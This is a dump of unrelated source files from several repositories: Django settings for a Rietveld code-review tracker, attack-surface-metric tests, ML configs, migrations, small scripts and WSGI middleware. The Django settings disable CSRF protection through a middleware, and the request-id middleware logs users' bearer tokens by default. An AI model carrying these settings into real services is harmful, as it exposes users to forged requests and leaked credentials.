<reponame>psf/bpo-rietveld # Django settings for django_gae2django project. # NOTE: Keep the settings.py in examples directories in sync with this one! import os, ConfigParser, re, subprocess DEBUG = False TEMPLATE_DEBUG = DEBUG ADMINS = ( # ('<NAME>', '<EMAIL>'), ) MANAGERS = ADMINS _c = ConfigParser.ConfigParser({'password':'', 'port':''}) _c.read(os.path.dirname(__file__)+"/../config.ini") TRACKER_COOKIE_NAME='roundup_session_'+re.sub('[^a-zA-Z]', '', _c.get('tracker','name')) DATABASE_ENGINE = 'postgresql_psycopg2' DATABASE_NAME = _c.get('rdbms', 'name') DATABASE_USER = _c.get('rdbms', 'user') DATABASE_PASSWORD = _c.get('rdbms', 'password') DATABASE_HOST = _c.get('rdbms', 'host') DATABASE_PORT = _c.get('rdbms', 'port') # Local time zone for this installation. Choices can be found here: # http://en.wikipedia.org/wiki/List_of_tz_zones_by_name # although not all choices may be available on all operating systems. # If running in a Windows environment this must be set to the same as your # system time zone. TIME_ZONE = 'Europe/Amsterdam' # Language code for this installation. All choices can be found here: # http://www.i18nguy.com/unicode/language-identifiers.html LANGUAGE_CODE = 'en-us' SITE_ID = 1 # If you set this to False, Django will make some optimizations so as not # to load the internationalization machinery. USE_I18N = True # Absolute path to the directory that holds media. # Example: "/home/media/media.lawrence.com/" MEDIA_ROOT = '' # URL that handles the media served from MEDIA_ROOT. Make sure to use a # trailing slash if there is a path component (optional in other cases). # Examples: "http://media.lawrence.com", "http://example.com/media/" MEDIA_URL = '/review/static/' # URL prefix for admin media -- CSS, JavaScript and images. Make sure to use a # trailing slash. # Examples: "http://foo.com/media/", "/media/". ADMIN_MEDIA_PREFIX = '/media/' # Make this unique, and don't share it with anybody. SECRET_KEY = _c.get('django', 'secret_key') # List of callables that know how to import templates from various sources. TEMPLATE_LOADERS = ( 'django.template.loaders.filesystem.load_template_source', 'django.template.loaders.app_directories.load_template_source', # 'django.template.loaders.eggs.load_template_source', ) AUTHENTICATION_BACKENDS = ('roundup_helper.middleware.UserBackend',) MIDDLEWARE_CLASSES = ( 'django.middleware.common.CommonMiddleware', 'django.contrib.sessions.middleware.SessionMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'roundup_helper.middleware.LookupRoundupUser', 'gae2django.middleware.FixRequestUserMiddleware', # Keep in mind, that CSRF protection is DISABLED in this example! 
'rietveld_helper.middleware.DisableCSRFMiddleware', 'rietveld_helper.middleware.AddUserToRequestMiddleware', 'django.middleware.doc.XViewMiddleware', ) TEMPLATE_CONTEXT_PROCESSORS = ( 'django.core.context_processors.auth', # required by admin panel 'django.core.context_processors.request', ) ROOT_URLCONF = 'roundup_helper.urls' TEMPLATE_DIRS = ( os.path.join(os.path.dirname(__file__), 'templates'), ) INSTALLED_APPS = ( 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.sites', 'django.contrib.admin', 'gae2django', 'rietveld_helper', 'codereview', ) AUTH_PROFILE_MODULE = 'codereview.Account' LOGIN_REDIRECT_URL = '/' #RIETVELD_INCOMING_MAIL_ADDRESS = ('<EMAIL>' % appid) RIETVELD_INCOMING_MAIL_MAX_SIZE = 500 * 1024 # 500K RIETVELD_REVISION = '<unknown>' try: p = subprocess.Popen(['hg','identify','-i', os.path.dirname(__file__)], stdout=subprocess.PIPE, stderr=subprocess.PIPE) out, err = p.communicate() RIETVELD_REVISION = out.strip() p.wait() del p, out, err except: pass UPLOAD_PY_SOURCE = os.path.join(os.path.dirname(__file__), 'upload.py') # Default values for patch rendering DEFAULT_CONTEXT = 10 DEFAULT_COLUMN_WIDTH = 80 MIN_COLUMN_WIDTH = 3 MAX_COLUMN_WIDTH = 2000 # This won't work with gae2django. RIETVELD_INCOMING_MAIL_ADDRESS = None
1.921875
2
tests/test_utilities.py
andymeneely/attack-surface-metrics
16
12789889
import copy import os import unittest import networkx as nx from attacksurfacemeter import utilities from attacksurfacemeter.call import Call from attacksurfacemeter.call_graph import CallGraph from attacksurfacemeter.environments import Environments from attacksurfacemeter.loaders.cflow_loader import CflowLoader from attacksurfacemeter.loaders.gprof_loader import GprofLoader class UtilitiesTestCase(unittest.TestCase): def test_fix(self): # Arrange target = CallGraph.from_loader( CflowLoader( os.path.join( os.path.dirname(os.path.realpath(__file__)), 'helloworld/cflow.callgraph.r.mod.txt' ), True ) ) _target = copy.deepcopy(target) reference = CallGraph.from_loader( GprofLoader( os.path.join( os.path.dirname(os.path.realpath(__file__)), 'helloworld/gprof.callgraph.txt' ) ) ) expected = { 'before': Call('GreeterSayHi', '', Environments.C), 'after': Call('GreeterSayHi', './src/helloworld.c', Environments.C) } # Act utilities.fix(target, using=reference) actual = { 'before': next( i for (i, _) in _target.nodes if i.function_name == 'GreeterSayHi' ), 'after': next( i for (i, _) in target.nodes if i.function_name == 'GreeterSayHi' ) } # Assert self.assertEqual(expected['before'], actual['before']) self.assertEqual(expected['after'], actual['after']) # Asserting if node attributes got carried over self.assertCountEqual( [ attrs for (i, attrs) in _target.nodes if i == expected['before'] ], [ attrs for (i, attrs) in target.nodes if i == expected['after'] ] ) # Asserting if edge attributes got carried over self.assertCountEqual( [ attrs for (i, j, attrs) in _target.edges if i == expected['before'] or j == expected['before'] ], [ attrs for (i, j, attrs) in target.edges if i == expected['after'] or j == expected['after'] ], ) # Asserting if OTHER nodes and their attributes got carried over self.assertCountEqual( [ (i, attrs) for (i, attrs) in _target.nodes if i != expected['before'] ], [ (i, attrs) for (i, attrs) in target.nodes if i != expected['after'] ] ) # Asserting if OTHER edges and their attributes got carried over self.assertCountEqual( [ (i, j, attrs) for (i, j, attrs) in _target.edges if i != expected['before'] and j != expected['before'] ], [ (i, j, attrs) for (i, j, attrs) in target.edges if i != expected['after'] and j != expected['after'] ], ) def test_get_fragments(self): # Arrange # a -- b e -- f -- g # | | # | | # d -- c h -- i j graph = nx.DiGraph() graph.add_nodes_from( ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j'] ) graph.add_edges_from([ ('a', 'b'), ('b', 'a'), ('b', 'c'), ('c', 'b'), ('c', 'd'), ('d', 'c'), ('d', 'a'), ('a', 'd'), ('e', 'f'), ('f', 'e'), ('f', 'g'), ('g', 'f'), ('h', 'i'), ('i', 'h') ]) expected = [None] * 4 expected[0] = nx.DiGraph() expected[0].add_nodes_from(['a', 'b', 'c', 'd']) expected[0].add_edges_from([ ('a', 'b'), ('b', 'a'), ('b', 'c'), ('c', 'b'), ('c', 'd'), ('d', 'c'), ('d', 'a'), ('a', 'd') ]) expected[1] = nx.DiGraph() expected[1].add_nodes_from(['e', 'f', 'g']) expected[1].add_edges_from( [('e', 'f'), ('f', 'e'), ('f', 'g'), ('g', 'f')] ) expected[2] = nx.DiGraph() expected[2].add_nodes_from(['h', 'i']) expected[2].add_edges_from([('i', 'h'), ('h', 'i')]) expected[3] = nx.DiGraph() expected[3].add_nodes_from(['j']) # Act actual = utilities.get_fragments(graph) actual.sort(key=lambda i: len(i.nodes()), reverse=True) # Assert self.assertEqual(len(expected), len(actual)) for i in range(4): self.assertCountEqual(expected[i].nodes(), actual[i].nodes()) self.assertCountEqual(expected[i].edges(), actual[i].edges()) def 
test_get_fragments_for_undirected(self): # Arrange # a -- b e -- f -- g # | | # | | # d -- c h -- i j graph = nx.Graph() graph.add_nodes_from( ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j'] ) graph.add_edges_from([ ('a', 'b'), ('b', 'c'), ('c', 'd'), ('d', 'a'), ('e', 'f'), ('f', 'g'), ('h', 'i') ]) # Assert self.assertRaises(Exception, utilities.get_fragments, graph) def test_get_largest_fragment(self): # Arrange # a -- b e -- f -- g # | | # | | # d -- c h -- i j graph = nx.DiGraph() graph.add_nodes_from( ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j'] ) graph.add_edges_from([ ('a', 'b'), ('b', 'a'), ('b', 'c'), ('c', 'b'), ('c', 'd'), ('d', 'c'), ('d', 'a'), ('a', 'd'), ('e', 'f'), ('f', 'e'), ('f', 'g'), ('g', 'f'), ('h', 'i'), ('i', 'h') ]) expected = nx.DiGraph() expected.add_nodes_from(['a', 'b', 'c', 'd']) expected.add_edges_from([ ('a', 'b'), ('b', 'a'), ('b', 'c'), ('c', 'b'), ('c', 'd'), ('d', 'c'), ('d', 'a'), ('a', 'd') ]) # Act actual = utilities.get_largest_fragment(utilities.get_fragments(graph)) # Assert self.assertCountEqual(expected.nodes(), actual.nodes()) self.assertCountEqual(expected.edges(), actual.edges()) def test_get_node_attrs(self): # Scenario: main -- printf (cflow) # Arrange source = 'cflow' caller = Call('main', 'main.c', Environments.C) callee = Call('printf', '', Environments.C) # Act (caller_attrs, callee_attrs) = utilities.get_node_attrs( source, caller, callee, list(), list() ) # Assert # Caller Attributes self.assertTrue('tested' not in caller_attrs) self.assertTrue('defense' not in caller_attrs) self.assertTrue('vulnerable' not in caller_attrs) self.assertTrue('dangerous' not in caller_attrs) self.assertTrue('entry' not in caller_attrs) self.assertTrue('exit' in caller_attrs) self.assertTrue('frequency' not in caller_attrs) # Callee Attributes self.assertIsNone(callee_attrs) # Scenario: main -- printf (gprof) # Arrange source = 'gprof' caller = Call('main', 'main.c', Environments.C) callee = Call('printf', '', Environments.C) # Act (caller_attrs, callee_attrs) = utilities.get_node_attrs( source, caller, callee, list(), list() ) # Assert # Caller Attributes self.assertTrue('tested' in caller_attrs) self.assertTrue('defense' not in caller_attrs) self.assertTrue('vulnerable' not in caller_attrs) self.assertTrue('dangerous' not in caller_attrs) self.assertTrue('entry' not in caller_attrs) self.assertTrue('exit' in caller_attrs) self.assertTrue('frequency' not in caller_attrs) # Callee Attributes self.assertIsNone(callee_attrs) # Scenario: main -- None (gprof) # Arrange source = 'gprof' caller = Call('main', 'main.c', Environments.C) callee = None # Act (caller_attrs, callee_attrs) = utilities.get_node_attrs( source, caller, callee, list(), list() ) # Assert # Caller Attributes self.assertTrue('tested' not in caller_attrs) self.assertTrue('defense' not in caller_attrs) self.assertTrue('vulnerable' not in caller_attrs) self.assertTrue('dangerous' not in caller_attrs) self.assertTrue('entry' not in caller_attrs) self.assertTrue('exit' not in caller_attrs) self.assertTrue('frequency' not in caller_attrs) # Callee Attributes self.assertIsNone(callee_attrs) # Scenario: main -- validate* (cflow) # * Designed defense # Arrange source = 'cflow' defenses = [Call('validate', 'utils.c', Environments.C)] caller = Call('main', 'main.c', Environments.C) callee = Call('validate', 'utils.c', Environments.C) # Act (caller_attrs, callee_attrs) = utilities.get_node_attrs( source, caller, callee, defenses, list() ) # Assert # Caller Attributes self.assertTrue('tested' 
not in caller_attrs) self.assertTrue('defense' not in caller_attrs) self.assertTrue('vulnerable' not in caller_attrs) self.assertTrue('dangerous' not in caller_attrs) self.assertTrue('entry' not in caller_attrs) self.assertTrue('exit' not in caller_attrs) self.assertTrue('frequency' not in caller_attrs) # Callee Attributes self.assertIsNotNone(callee_attrs) self.assertTrue('tested' not in callee_attrs) self.assertTrue('defense' in callee_attrs) self.assertTrue('vulnerable' not in caller_attrs) self.assertTrue('dangerous' not in caller_attrs) self.assertTrue('entry' not in caller_attrs) self.assertTrue('exit' not in caller_attrs) self.assertEqual(callee_attrs['frequency'], 1) # Scenario: main -- validate* (cflow) # * Vulnerable # Arrange source = 'cflow' vulnerabilities = [Call('validate', 'utils.c', Environments.C)] caller = Call('main', 'main.c', Environments.C) callee = Call('validate', 'utils.c', Environments.C) # Act (caller_attrs, callee_attrs) = utilities.get_node_attrs( source, caller, callee, list(), vulnerabilities ) # Assert # Caller Attributes self.assertTrue('tested' not in caller_attrs) self.assertTrue('defense' not in callee_attrs) self.assertTrue('vulnerable' not in caller_attrs) self.assertTrue('dangerous' not in caller_attrs) self.assertTrue('entry' not in caller_attrs) self.assertTrue('exit' not in caller_attrs) self.assertTrue('frequency' not in caller_attrs) # Callee Attributes self.assertIsNotNone(callee_attrs) self.assertTrue('tested' not in callee_attrs) self.assertTrue('defense' not in callee_attrs) self.assertTrue('vulnerable' in callee_attrs) self.assertTrue('dangerous' not in caller_attrs) self.assertTrue('entry' not in caller_attrs) self.assertTrue('exit' not in caller_attrs) self.assertEqual(callee_attrs['frequency'], 1) # Scenario: main* -- validate+ (cflow) # * Vulnerable # + Designed defense and vulnerable # Arrange source = 'cflow' defenses = [Call('validate', 'utils.c', Environments.C)] vulnerabilities = [ Call('main', 'main.c', Environments.C), Call('validate', 'utils.c', Environments.C) ] caller = Call('main', 'main.c', Environments.C) callee = Call('validate', 'utils.c', Environments.C) # Act (caller_attrs, callee_attrs) = utilities.get_node_attrs( source, caller, callee, defenses, vulnerabilities ) # Assert # Caller Attributes self.assertTrue('tested' not in caller_attrs) self.assertTrue('defense' not in caller_attrs) self.assertTrue('vulnerable' in caller_attrs) self.assertTrue('dangerous' not in caller_attrs) self.assertTrue('entry' not in caller_attrs) self.assertTrue('exit' not in caller_attrs) self.assertTrue('frequency' not in caller_attrs) # Callee Attributes self.assertIsNotNone(callee_attrs) self.assertTrue('tested' not in callee_attrs) self.assertTrue('defense' in callee_attrs) self.assertTrue('vulnerable' in callee_attrs) self.assertTrue('dangerous' not in caller_attrs) self.assertTrue('entry' not in caller_attrs) self.assertTrue('exit' not in caller_attrs) self.assertEqual(callee_attrs['frequency'], 1) # Scenario: main* -- validate+ (cflow) # * Designed defense # + Designed defense and vulnerable # Arrange source = 'cflow' defenses = [ Call('main', 'main.c', Environments.C), Call('validate', 'utils.c', Environments.C) ] vulnerabilities = [ Call('main', 'main.c', Environments.C), Call('validate', 'utils.c', Environments.C) ] caller = Call('main', 'main.c', Environments.C) callee = Call('validate', 'utils.c', Environments.C) # Act (caller_attrs, callee_attrs) = utilities.get_node_attrs( source, caller, callee, defenses, vulnerabilities ) # 
Assert # Caller Attributes self.assertTrue('tested' not in caller_attrs) self.assertTrue('defense' in caller_attrs) self.assertTrue('vulnerable' in caller_attrs) self.assertTrue('dangerous' not in caller_attrs) self.assertTrue('entry' not in caller_attrs) self.assertTrue('exit' not in caller_attrs) self.assertTrue('frequency' not in caller_attrs) # Callee Attributes self.assertIsNotNone(callee_attrs) self.assertTrue('tested' not in callee_attrs) self.assertTrue('defense' in callee_attrs) self.assertTrue('vulnerable' in callee_attrs) self.assertTrue('dangerous' not in caller_attrs) self.assertTrue('entry' not in caller_attrs) self.assertTrue('exit' not in caller_attrs) self.assertEqual(callee_attrs['frequency'], 1) # Scenario: main -- chown (cflow) # Arrange source = 'cflow' caller = Call('main', 'main.c', Environments.C) callee = Call('chown', '', Environments.C) # Act (caller_attrs, callee_attrs) = utilities.get_node_attrs( source, caller, callee, list(), list() ) # Assert # Caller Attributes self.assertTrue('tested' not in caller_attrs) self.assertTrue('defense' not in caller_attrs) self.assertTrue('vulnerable' not in caller_attrs) self.assertTrue('dangerous' in caller_attrs) self.assertTrue('entry' not in caller_attrs) self.assertTrue('exit' not in caller_attrs) self.assertTrue('frequency' not in caller_attrs) # Callee Attributes self.assertIsNone(callee_attrs) if __name__ == '__main__': unittest.main()
2.40625
2
output/models/ms_data/regex/regex_test_535_xsd/__init__.py
tefra/xsdata-w3c-tests
1
12789890
from output.models.ms_data.regex.regex_test_535_xsd.regex_test_535 import Doc __all__ = [ "Doc", ]
1.039063
1
kodialect/models/textcnn/configuration_textcnn.py
jinmang2/KoBART-dialect
3
12789891
from transformers.configuration_utils import PretrainedConfig class TextCNNConfig(PretrainedConfig): def __init__( self, vocab_size=30000, embed_dim=300, filter_sizes=[1,2,3,4,5], num_filters=[128]*5, dropout=0.5, num_labels=2, id2label={0:"standard", 1:"dialect"}, label2id={"standard":0, "dialect":1}, bos_token_id=0, eos_token_id=1, pad_token_id=3, **kwargs, ): super().__init__( num_labels=num_labels, id2label=id2label, label2id=label2id, bos_token_id=bos_token_id, eos_token_id=eos_token_id, pad_token_id=pad_token_id, **kwargs, ) self.vocab_size = vocab_size self.embed_dim = embed_dim self.filter_sizes = filter_sizes self.num_filters = num_filters self.dropout = dropout
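# Quick usage check (added sketch): the defaults give one 128-filter bank per
# kernel size and a binary standard/dialect label map.
# config = TextCNNConfig(vocab_size=32000)
# assert config.num_filters == [128] * 5 and config.num_labels == 2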
2.53125
3
com/Leetcode/728.SelfDividingNumbers.py
samkitsheth95/InterviewPrep
0
12789892
<reponame>samkitsheth95/InterviewPrep from typing import List class Solution: def isValid(self, a): theNum = a while a > 0: temp = a % 10 if not temp or theNum % temp: return False a = a // 10 return True def selfDividingNumbers(self, left: int, right: int) -> List[int]: ans = [] for i in range(left, right+1): if self.isValid(i): ans.append(i) return ans sol = Solution() print(sol.selfDividingNumbers(1, 22))
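# Added note: a number is self-dividing when every digit is non-zero and divides
# the number itself, e.g. 128 -> 128 % 1 == 0, 128 % 2 == 0, 128 % 8 == 0.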
3.875
4
Project/dailyFresh/myDailyFresh/apps/goods/migrations/0002_auto_20210305_1756.py
chaofan-zheng/python_learning_code
0
12789893
# Generated by Django 2.2.17 on 2021-03-05 09:56 from django.db import migrations import tinymce.models class Migration(migrations.Migration): dependencies = [ ('goods', '0001_initial'), ] operations = [ migrations.AlterModelOptions( name='goodstest', options={'verbose_name': '商品', 'verbose_name_plural': '商品'}, ), migrations.AlterField( model_name='goodstest', name='detail', field=tinymce.models.HTMLField(verbose_name='商品详情'), ), ]
1.429688
1
py3odb/cli/command.py
opus49/py3odb
1
12789894
"""Module for abstract Command class to support argument parsing.""" from abc import ABC, abstractmethod from argparse import RawTextHelpFormatter class Command(ABC): """Abstract class that defines a command for argument parsing.""" help_text = None def __init__(self, subparsers): self.subparsers = subparsers self.parser = subparsers.add_parser( self.name, description=self.description, formatter_class=RawTextHelpFormatter ) self.add_arguments() self.parser.set_defaults(command=self.command) @property def name(self): """The name of this command.""" return self.__class__.__name__.replace("Command", "").lower() @property def description(self): """The description to print before help text.""" return "" @abstractmethod def add_arguments(self): """Add the arguments specific to this command.""" self.parser.add_argument("filename", help="The ODB2 filename.") @abstractmethod def command(self, args): """The underlying function that is called when a command is selected."""
3.765625
4
Unit 3 SC/acme_report.py
Tyler9937/DS-Unit-3-Sprint-1-Software-Engineering
0
12789895
# Importing needed library and Product class import random from acme import Product # creating lists of adjectives and nouns adjectives = ['Cool', 'Flavorful', 'Shiny', 'Awesome'] nouns = ['Phone', 'PS4', 'Computer', 'Anvil'] def generate_products(num_products=30): ''' creates a list of products given the num_products input and the adjectives and nouns lists ''' products = [] for i in range(0, num_products): name = random.choice(adjectives) + ' ' + random.choice(nouns) price = random.randint(5, 100) weight = random.randint(5, 100) flammability = random.uniform(0.0, 2.5) products.append(Product(name=name, price=price, weight=weight, flammability=flammability)) return products def inventory_report(products): ''' takes a list of products as input and prints a summary ''' price_list = [] weight_list = [] flame_list = [] for obj in products: price_list.append(obj.price) weight_list.append(obj.weight) flame_list.append(obj.flammability) average_price = sum(price_list) / len(price_list) average_weight = sum(weight_list) / len(weight_list) average_flame = sum(flame_list) / len(flame_list) print('ACME CORPORATION OFFICIAL INVENTORY REPORT') print('Unique product names: ' + str(len(set(p.name for p in products)))) print('Average price: {}'.format(average_price)) print('Average weight: {}'.format(average_weight)) print('Average flammability: {}'.format(average_flame)) if __name__ == '__main__': inventory_report(generate_products())
3.828125
4
move_1.py
Housebear/python-learning
0
12789896
#!/usr/bin/python3 # -*- coding:utf-8 -*- # File Name: move_1.py # Author: Lipsum # Mail: <EMAIL> # Created Time: 2016-05-11 18:25:12 def move(n, source, bridge, destination): if n == 1: print(source, '-->', destination) else: move(n-1, source, destination, bridge) move(1, source, bridge, destination) move(n-1, bridge, source, destination) num = ('A','B','C') move(3,*num)
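# Added note: classic Tower of Hanoi recursion -- move n-1 discs onto the spare
# peg, move the largest disc to the destination, then move the n-1 discs on top
# of it; move(3, *num) above therefore prints 2**3 - 1 = 7 moves.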
3.515625
4
migrations/versions/8fb490efb894_.py
maiorano84/ctaCompanion
2
12789897
"""empty message Revision ID: 8fb490efb894 Revises: <KEY> Create Date: 2020-06-15 20:33:31.609050 """ from alembic import op import sqlalchemy as sa # revision identifiers, used by Alembic. revision = '8fb490efb894' down_revision = '<KEY>' branch_labels = None depends_on = None def upgrade(): # ### commands auto generated by Alembic - please adjust! ### op.create_table('boss_base', sa.Column('id', sa.Integer(), nullable=False), sa.Column('name', sa.String(length=32), nullable=True), sa.Column('nameSafe', sa.String(length=32), nullable=True), sa.PrimaryKeyConstraint('id') ) op.create_index(op.f('ix_boss_base_name'), 'boss_base', ['name'], unique=True) op.create_index(op.f('ix_boss_base_nameSafe'), 'boss_base', ['nameSafe'], unique=True) op.create_table('bossteam', sa.Column('id', sa.Integer(), nullable=False), sa.Column('hero', sa.String(length=16), nullable=True), sa.Column('damage', sa.Integer(), nullable=True), sa.Column('user_id', sa.Integer(), nullable=True), sa.Column('bossbase_id', sa.Integer(), nullable=True), sa.ForeignKeyConstraint(['bossbase_id'], ['boss_base.id'], ), sa.ForeignKeyConstraint(['user_id'], ['user.id'], ), sa.PrimaryKeyConstraint('id') ) op.create_index(op.f('ix_bossteam_damage'), 'bossteam', ['damage'], unique=False) op.create_index(op.f('ix_bossteam_hero'), 'bossteam', ['hero'], unique=False) # ### end Alembic commands ### def downgrade(): # ### commands auto generated by Alembic - please adjust! ### op.drop_index(op.f('ix_bossteam_hero'), table_name='bossteam') op.drop_index(op.f('ix_bossteam_damage'), table_name='bossteam') op.drop_table('bossteam') op.drop_index(op.f('ix_boss_base_nameSafe'), table_name='boss_base') op.drop_index(op.f('ix_boss_base_name'), table_name='boss_base') op.drop_table('boss_base') # ### end Alembic commands ###
1.882813
2
comment_list_brige.py
jonatep/ace-attorney-twitter-bot
0
12789898
class Comment: def __init__(self, tweet): self.author = Author(tweet.user.name) self.body = tweet.full_text if (len(self.body) == 0): self.body = '...' self.score = 0 class Author: def __init__(self, name): self.name = name
3.046875
3
wsgi_microservice_middleware/request_id.py
presalytics/WSGI-Microservice-Middleware
1
12789899
""" Middleware and logging filter to add request ids to logs and forward request Ids in downstream requests """ import logging import re import traceback import datetime import pythonjsonlogger import pythonjsonlogger.jsonlogger import wsgi_microservice_middleware logger = logging.getLogger(__name__) REQUEST_ID_HEADER_NAME = wsgi_microservice_middleware.env.str("REQUEST_ID_HEADER", "X-Request-Id") LOG_TOKENS = wsgi_microservice_middleware.env.bool("LOG_TOKENS", True) def make_wsgi_header_key(header: str): wsgi_header = "HTTP_" + REQUEST_ID_HEADER_NAME.replace("-","_").upper() return wsgi_header class RequestIdMiddleware(object): """ This middleware add access log-style record with a request id and includes the request Id in int he response headers """ def __init__(self, app, header_name: str = None): self.header_name = header_name if not self.header_name: self.header_name = REQUEST_ID_HEADER_NAME self.wsgi_header_key = make_wsgi_header_key(self.header_name) self.app = app def __call__(self, environ, start_response): def custom_start_response(status, headers, exc_info=None): # append whatever headers you need here FACTS = [ environ.get("HTTP_HOST", ""), environ.get("REQUEST_METHOD", ""), environ.get("RAW_URI", ""), environ.get("SERVER_PROTOCOL", ""), status ] message = " | ".join(FACTS) request_id = environ.get(self.wsgi_header_key, '""') extra = {"request_id": request_id} token = None if LOG_TOKENS: try: auth_header = environ.get("HTTP_AUTHORIZATION", None) token = re.sub(r"\W", "", auth_header.lstrip("Bearer")) if token: extra.update({"token": token}) except Exception: # No exception log, requst missing token pass adpater = logging.LoggerAdapter(logger, extra=extra) adpater.info(message) headers.append((self.header_name, request_id,)) return start_response(status, headers, exc_info) return self.app(environ, custom_start_response) def current_request_id(): """ Retrives the current request id from the wsgi `environ` buried in the call stack """ _req = None wsgi_header = "HTTP_" + REQUEST_ID_HEADER_NAME.replace("-","_").upper() try: for frame in traceback.walk_stack(None): if getattr(frame[0], 'f_globals', None) and getattr(frame[0], 'f_locals', None): if frame[0].f_globals.get('__name__', None) == __name__ and 'environ' in frame[0].f_locals: environ = frame[0].f_locals['environ'] _req = environ.get(wsgi_header, None) break except Exception: pass return _req class RequestIdFilter(logging.Filter): """ Logger filter to add a `{request_id}` logger variable tot he logging context """ def __init__(self, header_name=REQUEST_ID_HEADER_NAME, *args, **kwargs): self.header_name = header_name self.wsgi_header_key = "HTTP_" + self.header_name.replace("-","_").upper() super().__init__(*args, **kwargs) def filter(self, record): record.request_id = self.get_current_request_id() return True def get_current_request_id(self): _req = current_request_id() if _req: request_id = _req else: request_id = "" return request_id class RequestIdJsonLogFormatter(pythonjsonlogger.jsonlogger.JsonFormatter): def add_fields(self, log_record, record, message_dict): super(RequestIdJsonLogFormatter, self).add_fields(log_record, record, message_dict) if not log_record.get('timestamp'): # this doesn't use record.created, so it is slightly off now = datetime.datetime.utcnow().astimezone(tz=datetime.timezone.utc).isoformat() log_record['timestamp'] = now if log_record.get('level'): log_record['level'] = log_record['level'].upper() else: log_record['level'] = record.levelname if not log_record.get('name'): log_record['name'] = 
record.name if not log_record.get('threadName'): log_record['threadName'] = record.threadName
2.703125
3
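A minimal usage sketch for the RequestIdMiddleware and RequestIdFilter above; the import path and the WSGI app callable here are assumptions for illustration only:

import logging
from wsgi_microservice_middleware.request_id import RequestIdMiddleware, RequestIdFilter  # assumed module path

def app(environ, start_response):  # hypothetical WSGI app
    start_response("200 OK", [("Content-Type", "text/plain")])
    return [b"hello"]

# Wrap the app so each response echoes the request id header
app = RequestIdMiddleware(app)

# Attach the filter so log records gain a request_id attribute
handler = logging.StreamHandler()
handler.addFilter(RequestIdFilter())
logging.getLogger().addHandler(handler)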
devops/__init__.py
crazypenguin/devops
300
12789900
<gh_stars>100-1000 from __future__ import absolute_import, unicode_literals from .celery import app as celery_app # from .job import scheduler # After the first process to acquire the file lock runs the task, if it is shut down mid-run and a new process is started, the task can still be executed multiple times __all__ = ['celery_app'] # __all__ = ['celery_app', 'scheduler'] # import pymysql # pymysql.install_as_MySQLdb()
1.203125
1
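The translated comment above describes a pitfall of file-lock-based scheduler startup: the lock serializes concurrently running processes but not restarts. A minimal sketch of that kind of guard, assuming Linux fcntl semantics (the path and function name are illustrative):

import fcntl

def try_acquire_scheduler_lock(path="/tmp/devops-scheduler.lock"):
    # Only the first process to take the lock should start the scheduler; a
    # process restarted later can re-acquire it and run the job again, which
    # is exactly the duplicate-execution risk the comment warns about.
    fh = open(path, "w")
    try:
        fcntl.flock(fh, fcntl.LOCK_EX | fcntl.LOCK_NB)
        return fh  # keep the handle open for the process lifetime to hold the lock
    except OSError:
        fh.close()
        return None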
helloworld.py
CptShock/AuroraModules
0
12789901
<gh_stars>0 import willie @willie.module.commands('helloworld') def helloworld(bot, trigger): bot.say('Hello World!')
1.828125
2
rattube.py
wormholesepiol/RatTube
3
12789902
# rattube.py # # Copyright 2020 <NAME> <<EMAIL>> # from termcolor import cprint from pyfiglet import figlet_format from pytube import YouTube import time from os import system, name import sys from colorama import init init(strip=not sys.stdout.isatty()) class RatTube: def limpiar_Pantalla(self): if name == "nt": _ = system('cls') else: _ = system('clear') ''' This method checks whether the platform is NT (Windows) or Linux. Depending on what the check returns, it runs the command that platform uses to clear the console''' def mostrar_Banner(self): cprint(figlet_format('RatTube', font='banner3'), 'yellow', 'on_blue', attrs=['bold']) '''Prints the banner shown on screen. The cprint method receives the text, the text color and the background color; attrs refers to the bold font weight. The text cprint receives is produced by formatting with figlet_format, which turns it into ASCII art and lets us pick among the fonts bundled with the pyfiglet library''' def limpiar_Mostrar_Banner(self): self.limpiar_Pantalla() self.mostrar_Banner() '''This method clears the screen and shows the banner. Both methods are called together because most callers need the banner to stay visible on a clean screen, keeping the focus on the download task''' def confirmar_Descargar(self): url = input('\n\nEnter the video URL: ') ruta = input('\nIn which path on your machine will you save the file\n(if you leave it empty, it is saved in the script directory)? ') yt = YouTube(url, on_progress_callback=self.progress_function) print("\n", yt.title) global video video = yt.streams.first() size1 = str(round(video.filesize / (1024 * 1024))) print("\nVideo size: ", size1, " MB approx.") video.download(ruta) tecla = input("\nPress any key to finish") time.sleep(3) print("\n\nGoodbye") '''This method uses the pytube library, its YouTube class and methods. It performs the video download, asking for a URL and a save path; by default the file is saved in the folder containing the script''' def progress_function(self, stream, chunk, file_handle, bytes_remaining): print(round((1-bytes_remaining/video.filesize)*100,3), '% done...') def descargar(self): self.limpiar_Mostrar_Banner() print("""\n\n1. Enter the video URL 2. Go back""") opcion = input("\nChoose an option: ") if opcion == "1": self.confirmar_Descargar() else: self.limpiar_Mostrar_Banner() self.mostrar_Menu(self.descargar, self.salir) '''This method confirms that we really want to enter the video URL. If we have not made a mistake, we confirm and provide the URL; otherwise we can choose to go back, which runs limpiar_Mostrar_Banner and calls the initial menu again''' def salir(self): self.limpiar_Pantalla() sys.exit() '''If we choose exit in the menu, this method runs. It lets us end the script without a keyboard interrupt''' def mostrar_Menu(self, descargar, salir): print("""\n1. Download a Youtube video 2. Exit""") choice = input("\nChoose an option: ") opciones = {"1": self.descargar, "2": self.salir} if choice in opciones: opciones[choice]() else: print("\nUnrecognized option") time.sleep(5) self.limpiar_Mostrar_Banner() self.mostrar_Menu(self.descargar, self.salir) '''Shows the initial menu. From here it calls the methods needed to run the download or exit actions''' rata = RatTube() rata.limpiar_Pantalla() rata.mostrar_Banner() rata.mostrar_Menu(rata.descargar, rata.salir)
2.59375
3
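A standalone sketch of a pytube progress callback like the one fixed above; note pytube's on_progress_callback signature changed across versions (newer releases pass (stream, chunk, bytes_remaining) without file_handle), so this assumes a recent pytube:

from pytube import YouTube

def on_progress(stream, chunk, bytes_remaining):
    # Use the stream's own filesize rather than a module-level global
    done = stream.filesize - bytes_remaining
    print(round(100 * done / stream.filesize, 3), "% done...")

def download(url, path="."):
    yt = YouTube(url, on_progress_callback=on_progress)
    yt.streams.first().download(path)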
django-api/rasaApp/urls.py
raghavwadhwa/RasaReactBOT
0
12789903
